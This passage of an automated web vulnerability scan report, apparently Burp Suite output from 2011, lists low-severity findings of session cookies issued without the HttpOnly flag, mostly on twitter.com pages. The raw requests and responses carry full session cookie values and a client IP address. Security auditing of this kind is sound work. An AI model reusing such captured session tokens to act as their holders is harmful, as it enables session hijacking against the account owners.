Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.173. http://twitter.com/slaterusa/status/28450023532396544 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/slaterusa/status/28450023532396544

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vc2xhdGVydXNh%250AL3N0YXR1cy8yODQ1MDAyMzUzMjM5NjU0NDoMY3NyZl9pZCIlMTFkMDY1ODkx%250AZmIzMTRjNTM4NzA5ZWFmNDcwOGFkNTI6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--aa39b3f6965406bbcece36f3eda8aef0cfd70c30; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /slaterusa/status/28450023532396544 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.174. http://twitter.com/statuses/user_timeline/14594657.rss previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/statuses/user_timeline/14594657.rss

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /statuses/user_timeline/14594657.rss HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-11803-53712
X-RateLimit-Limit: 150
ETag: "d9f15add89742f23e51649d51653ea0c"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-RateLimit-Remaining: 145
X-Runtime: 0.03892
X-Transaction-Mask: 0b5b266a28469a7b52ded76c9a66f018
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 12107
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1296227305
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:georss="http://www.georss.org/georss" xmlns:twitter="http://api.twitter.com">
<channel>
<
...[SNIP]...

11.175. http://twitter.com/stubbornella previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/stubbornella

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /stubbornella HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.176. http://twitter.com/thehomeorg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/thehomeorg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMY3NyZl9pZCIlYWJjNDU1YzliNDU1YmMzN2QwZmQyOWYyNmE1ZTMx%250AMWM6FWluX25ld191c2VyX2Zsb3cwOg9jcmVhdGVkX2F0bCsIM07wzC0BOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--20fad198c863fbb6166907be6f67cbeb22702d85; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /thehomeorg HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.177. http://twitter.com/tos previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/tos

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToMY3NyZl9pZCIlYTVmY2EyMDkzM2Y2ZWRjNTgyZmQ3ZDA5ZDQwYWE1%250AMDY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--2b07f7d8732d93af6476b2abb8e4dcef9120730e; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tos HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.178. http://twitter.com/townsandtrails previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/townsandtrails

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /townsandtrails HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.179. http://twitter.com/travis previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/travis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.180. http://twitter.com/tylerseguin92 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/tylerseguin92

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tylerseguin92 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.181. http://twitter.com/waynecountylife previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/waynecountylife

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIidodHRwOi8vdHdpdHRlci5jb20vd2F5bmVjb3Vu%250AdHlsaWZlOgxjc3JmX2lkIiUyZDVjNDY0MjVjZjk4MWU0NDI1ZGZkZWI1OTNl%250ANDIxYzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--90d7bcbfc68d4b17546f6b6e6696899149d482a7; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /waynecountylife HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.182. http://twitter.com/webandy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/webandy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIh9odHRwOi8vdHdpdHRlci5jb20vd2ViYW5keToM%250AY3NyZl9pZCIlMzU4ODlhZDFhNTVmNjY2ODliNTc5MzYzYjlkMzVmNjc6B2lk%250AIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--69ca8ae41a9f970b1732fe7d2a927b6f2859758a; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webandy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.183. http://twitter.com/webandy/status/30434889127960577 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/webandy/status/30434889127960577

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6DGNzcmZfaWQiJTI5OWQ2NTRkM2U2%250AN2EyOGYyMDE5ZGJhNjA0YjRhZmM2OgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--84b9c2aee944901e5bd61754af202b278a459d82; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webandy/status/30434889127960577 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.184. http://twitter.com/widgets previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/widgets

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widgets HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 301 Moved Permanently
Date: Fri, 28 Jan 2011 17:13:10 GMT
Server: hi
Status: 301 Moved Permanently
X-Transaction: 1296234790-96747-3920
Last-Modified: Fri, 28 Jan 2011 17:13:10 GMT
Location: http://twitter.com/about/resources/widgets
X-Runtime: 0.00778
Content-Type: text/html; charset=utf-8
Content-Length: 108
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/about/resources/widgets">redirected</a>.</body></html>

11.185. http://twitter.com/zonajones previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/zonajones

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zonajones HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.186. http://www.berkshireeagle.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.berkshireeagle.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=RTFIABV0BZYUKCUUCAWCFEY; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.berkshireeagle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.187. http://www.collegeanduniversity.net/herald/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.collegeanduniversity.net
Path:	/herald/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=23963338;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
CFTOKEN=f88699cd696e59f-D0093CEE-19B9-F336-D82E00A07F24E43B;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
JSESSIONID=2230a73fafc47a1826775e4a1668b3f46594;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /herald/ HTTP/1.1
Host: www.collegeanduniversity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:22 GMT
Server: Apache
Set-Cookie: CFID=23963338;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
Set-Cookie: CFTOKEN=f88699cd696e59f-D0093CEE-19B9-F336-D82E00A07F24E43B;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
Set-Cookie: JSESSIONID=2230a73fafc47a1826775e4a1668b3f46594;path=/
Set-Cookie: CUNET.SHOWDEBUG=0;path=/
Set-Cookie: CU2005FRONTAPPKEY.SHOWDEBUG=0;path=/
Set-Cookie: CID=175;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
P3P: CP='ADMa DEVa OUR IND DSP NON COR'
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28386

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Find Online College Degrees - Top Online Universities at Collegeanduniversity.net</title>
<meta name="Descriptio
...[SNIP]...

11.188. http://www.dominionenterprises.com/main/do/Privacy_Policy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dominionenterprises.com
Path:	/main/do/Privacy_Policy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=7d3a89d5f21954b4e37104192891668e; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/

